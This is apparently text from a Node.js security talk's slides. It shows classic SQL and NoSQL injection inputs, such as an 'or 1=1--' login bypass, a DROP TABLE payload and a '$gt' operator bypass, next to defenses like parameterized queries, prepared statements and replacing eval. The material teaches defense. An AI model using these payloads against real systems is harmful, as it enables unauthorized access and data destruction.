  • 26. Hacking in Node.js #sitWDF SQL and NoSQL Injection Classic SQL Injection Bypass SELECT * FROM users WHERE username = '$username' AND password = '$password‘ (SELECT * FROM users WHERE username = '' or 1=1--' AND password = '‘) select author from books where id=$id -> (select author from books where id=2 or 1=1) Statement stmt = conn.createStatement("INSERT INTO students VALUES('" + user + "')"); stmt.execute(); (Robert'); DROP TABLE students; --) db.users.find({username: username, password: password}); (NoSQL) { "username": {"$gt": ""}, "password": {"$gt": ""} }
  • 27. Secure Node.js #sitWDF Protection XSS Prevention • Sanitize untrusted HTML http://jsxss.com/en/index.html https://github.com/theSmaw/Caja-HTML-Sanitizer https://www.owasp.org/index.php/Projects/OWASP_Node_js_Goat_Project SSJSI Prevention • Substitution of the eval() with the JSON.parse() function, the code is no longer injectable • Use child_process.execFile or child_process.spawn instead of child_process.exec
  • 28. Secure Node.js #sitWDF Protection SQL and NoSQL Injection Prevention • Using Parameterize SQL var q = 'SELECT name FROM books WHERE id = $1'; client.query(q, ['3'], function(err, result) {}); • PreparedStatements avoid/prevent SQL Injection Statement stmt = conn.prepareStatement("INSERT INTO student VALUES(?)"); stmt.setString(1, user); stmt.execute(); (Use the $in Operator to Match Values) db.users.find({user: { $in: [user] }, pass: { $in: [pass] }}); (NoSQL)
  • 30. Positive Side • Social Good: find solution for social benefit, operations and emergencies • Penetration Testing: to find vulnerabilities that an attacker could exploit • open-source: much of this open-source code is produced, tested and improved by hackers, usually like hackathons #sitWDF Good Cause
  • 31. Negative Side • Corruption of government officials (58.0%) • Cyber-terrorism (44.8%) • Corporate tracking of personal information (44.6%) • Terrorist attacks (44.4%) • Government tracking of personal information (41.4%) • Bio-warfare (40.9%) • Identity theft (39.6%) • Economic collapse (39.2%) • Running out of money in the future (37.4%) • Credit card fraud (36.9%) • Source: Chapman University #sitWDF Top 10 fears of 2015
  • 35. Who is the Winner? A "Hacker" is a state of mind. A “Developer" is a state of function. #sitWDF Choice is Yours